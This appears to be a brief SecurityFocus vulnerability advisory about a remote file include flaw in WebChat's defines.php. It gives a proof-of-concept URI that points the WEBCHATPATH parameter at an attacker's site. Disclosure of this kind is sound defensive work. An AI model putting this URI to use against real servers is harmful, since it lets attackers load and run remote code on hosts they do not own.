WebChat Defines.PHP Remote File Include Vulnerability

Attackers can exploit this issue through a web client.

The following proof-of-concept URI is available:

http://example.com/[webchat-077_path]/defines.php?WEBCHATPATH=attacker's site


 

Privacy Statement
Copyright 2010, SecurityFocus